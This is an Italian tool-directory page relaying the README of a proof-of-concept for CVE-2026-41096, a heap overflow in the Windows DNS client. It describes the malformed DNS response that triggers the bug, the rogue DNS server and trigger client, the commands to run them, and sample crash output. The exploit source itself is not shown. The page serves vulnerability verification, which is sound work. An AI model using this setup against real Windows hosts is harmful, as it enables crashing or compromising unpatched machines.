Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41096 — Proof-of-concept exploit per CVE-2026-41096: heap overflow in DnsRawTruncateMessageForUdp() del client DNS di Windows. Include un server DNS rogue e un client trigger per confermare la vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/m0n1x90/cve-2026-41096
Generazione di PayloadAnalisi delle VulnerabilitàExploitFuzzingAnalisi DNSBinary Exploitation
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

Proof-of-concept exploit per CVE-2026-41096: heap overflow in DnsRawTruncateMessageForUdp() del client DNS di Windows. Include un server DNS rogue e un client trigger per confermare la vulnerabilità.

Vedi Repository
3233 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41096 - PoC di Crash

Overflow dell'heap in DnsRawTruncateMessageForUdp() (dnsapi.dll). Una risposta DNS appositamente predisposta con QDCOUNT=0 e un ampio record OPT causa un overflow dell'heap di 604 byte quando la logica di troncamento calcola erroneamente il puntatore di destinazione.

Avviso MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

Componenti

FileDescrizione
rogue_dns_server.pyServer DNS rogue (Python 3). Risponde a ogni query con una risposta QDCOUNT=0 + OPT (623 byte).
trigger_client.cClient trigger (C/Win32). Chiama DnsQueryRaw puntando al server rogue. Intercetta il crash tramite SetUnhandledExceptionFilter.

Requisiti

Attaccante (server rogue):

  • Python 3
  • Accesso root/amministratore (porta 53)

Vittima (client trigger):

  • Sistema Windows con servizio DnsCache (necessita di DnsQueryRaw)
  • Versione vulnerabile di dnsapi.dll
  • Visual Studio / Windows SDK (per la compilazione)

Utilizzo

1. Avviare il server rogue:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. Compilare ed eseguire il client trigger:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (Facoltativo) Abilitare Page Heap per un crash deterministico:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

Codici di uscita

CodiceSignificato
0Il sistema è patchato (DNS_ERROR_BAD_PACKET restituito correttamente)
1Errore (DnsQueryRaw non trovato, problema di rete, ecc.)
2Crash rilevato (overflow dell'heap confermato)

Output di esempio

Vulnerabile (Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Vulnerabile (senza Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Patchato:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
Scarica lo strumento